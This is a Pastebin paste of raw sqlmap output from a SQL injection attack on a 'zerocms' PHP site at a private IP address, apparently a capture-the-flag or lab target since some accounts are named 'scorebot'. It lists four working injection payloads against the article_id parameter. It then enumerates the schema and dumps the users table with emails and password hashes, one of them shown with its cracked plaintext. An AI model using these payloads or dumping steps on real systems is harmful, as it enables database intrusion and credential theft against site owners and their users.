  1157. | 2 | test | test@example.com | *4AD47E08DAE2BD4F0977EED5D23DC901359DF617 (abcd1234) | 1 |
  1158. | 3 | scorebot | scorebot@alpha.net | *ECE94505E92F10DA0A7F0F0D4423ED2A4F50937B | 1 |
  1159. | 4 | scorebot | scorebot@gamma.net | *2946E303DFA13F709B6DF6DB1167D921BEFFF7EA | 1 |
  1160. +---------+---------------+--------------------+------------------------------------------------------+--------------+
  1161.  
  1162. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  1163. ---
  1164. Parameter: #1* (URI)
  1165. Type: boolean-based blind
  1166. Title: AND boolean-based blind - WHERE or HAVING clause
  1167. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND 9562=9562
  1168.  
  1169. Type: error-based
  1170. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  1171. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT 3978 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (CASE WHEN (3978=3978) THEN 1 ELSE 0 END)),0x716b707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  1172.  
  1173. Type: UNION query
  1174. Title: MySQL UNION query (NULL) - 6 columns
  1175. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=-4178 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162626b71,0x547676426143646f4f41,0x716b707671),NULL,NULL#
  1176.  
  1177. Type: AND/OR time-based blind
  1178. Title: MySQL > 5.0.11 AND time-based blind (SELECT)
  1179. Payload: http://10.100.101.130:80/zero_view_article.php/?article_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xfeB)
  1180. ---
  1181. web server operating system: Linux Debian 7.0 (wheezy)
  1182. web application technology: Apache 2.2.22, PHP 5.4.4
  1183. back-end DBMS: MySQL >= 5.0.0
  1184. Database: zerocms
  1185. [4 tables]
  1186. +--------------------+
  1187. | zero_access_levels |
  1188. | zero_articles |
  1189. | zero_comments |
  1190. | zero_users |
  1191. +--------------------+
  1192.  
  1193. Database: zerocms
  1194. Table: zero_articles
  1195. [7 columns]
  1196. +--------------+------------------+
  1197. | Column | Type |
  1198. +--------------+------------------+
  1199. | article_id | int(10) unsigned |
  1200. | article_text | mediumtext |
  1201. | is_published | tinyint(1) |
  1202. | publish_date | datetime |
  1203. | submit_date | datetime |
  1204. | title | varchar(255) |
  1205. | user_id | int(10) unsigned |
  1206. +--------------+------------------+
  1207.  
  1208. Database: zerocms
  1209. Table: zero_access_levels
  1210. [2 columns]
  1211. +--------------+---------------------+
  1212. | Column | Type |
  1213. +--------------+---------------------+
  1214. | access_level | tinyint(3) unsigned |
  1215. | access_name | varchar(50) |
  1216. +--------------+---------------------+
  1217.  
  1218. Database: zerocms
  1219. Table: zero_comments
  1220. [5 columns]
  1221. +--------------+------------------+
  1222. | Column | Type |
  1223. +--------------+------------------+
  1224. | article_id | int(10) unsigned |
  1225. | comment_date | datetime |
  1226. | comment_id | int(10) unsigned |
  1227. | comment_text | mediumtext |
  1228. | user_id | int(10) unsigned |
  1229. +--------------+------------------+
  1230.  
  1231. Database: zerocms
  1232. Table: zero_users
  1233. [5 columns]
  1234. +--------------+---------------------+
  1235. | Column | Type |
  1236. +--------------+---------------------+
  1237. | access_level | tinyint(3) unsigned |
  1238. | email | varchar(100) |
  1239. | name | varchar(100) |
  1240. | password | char(41) |
  1241. | user_id | int(10) unsigned |
  1242. +--------------+---------------------+
  1243.  
  1244. Database: zerocms
  1245. Table: zero_access_levels
  1246. [3 entries]
  1247. +---------------+--------------+
  1248. | access_name | access_level |
  1249. +---------------+--------------+
  1250. | User | 1 |
  1251. | Moderator | 2 |
  1252. | Administrator | 3 |
  1253. +---------------+--------------+
  1254.  
  1255. Database: zerocms
  1256. Table: zero_articles
  1257. [1 entry]
  1258. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  1259. | user_id | article_id | title | submit_date | publish_date | article_text | is_published |
  1260. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  1261. | 1 | 1 | testing | 2014-07-07 17:48:27 | 2014-07-07 17:49:05 | 123... | 1 |
  1262. +---------+------------+---------+---------------------+---------------------+--------------+--------------+
  1263.  
  1264. Database: zerocms
  1265. Table: zero_comments
  1266. [0 entries]
  1267. +---------+------------+------------+--------------+--------------+
  1268. | user_id | comment_id | article_id | comment_date | comment_text |
  1269. +---------+------------+------------+--------------+--------------+
  1270. +---------+------------+------------+--------------+--------------+
  1271.  
  1272. Database: zerocms
  1273. Table: zero_users
  1274. [4 entries]
  1275. +---------+---------------+--------------------+-------------------------------------------+--------------+
  1276. | user_id | name | email | password | access_level |
  1277. +---------+---------------+--------------------+-------------------------------------------+--------------+
  1278. | 1 | Administrator | admin@domain.com | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 | 3 |
  1279. | 2 | test | test@example.com | *4AD47E08DAE2BD4F0977EED5D23DC901359DF617 | 1 |
  1280. | 3 | scorebot | scorebot@alpha.net | *ECE94505E92F10DA0A7F0F0D4423ED2A4F50937B | 1 |
  1281. | 4 | scorebot | scorebot@gamma.net | *2946E303DFA13F709B6DF6DB1167D921BEFFF7EA | 1 |
  1282. +---------+---------------+--------------------+-------------------------------------------+--------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!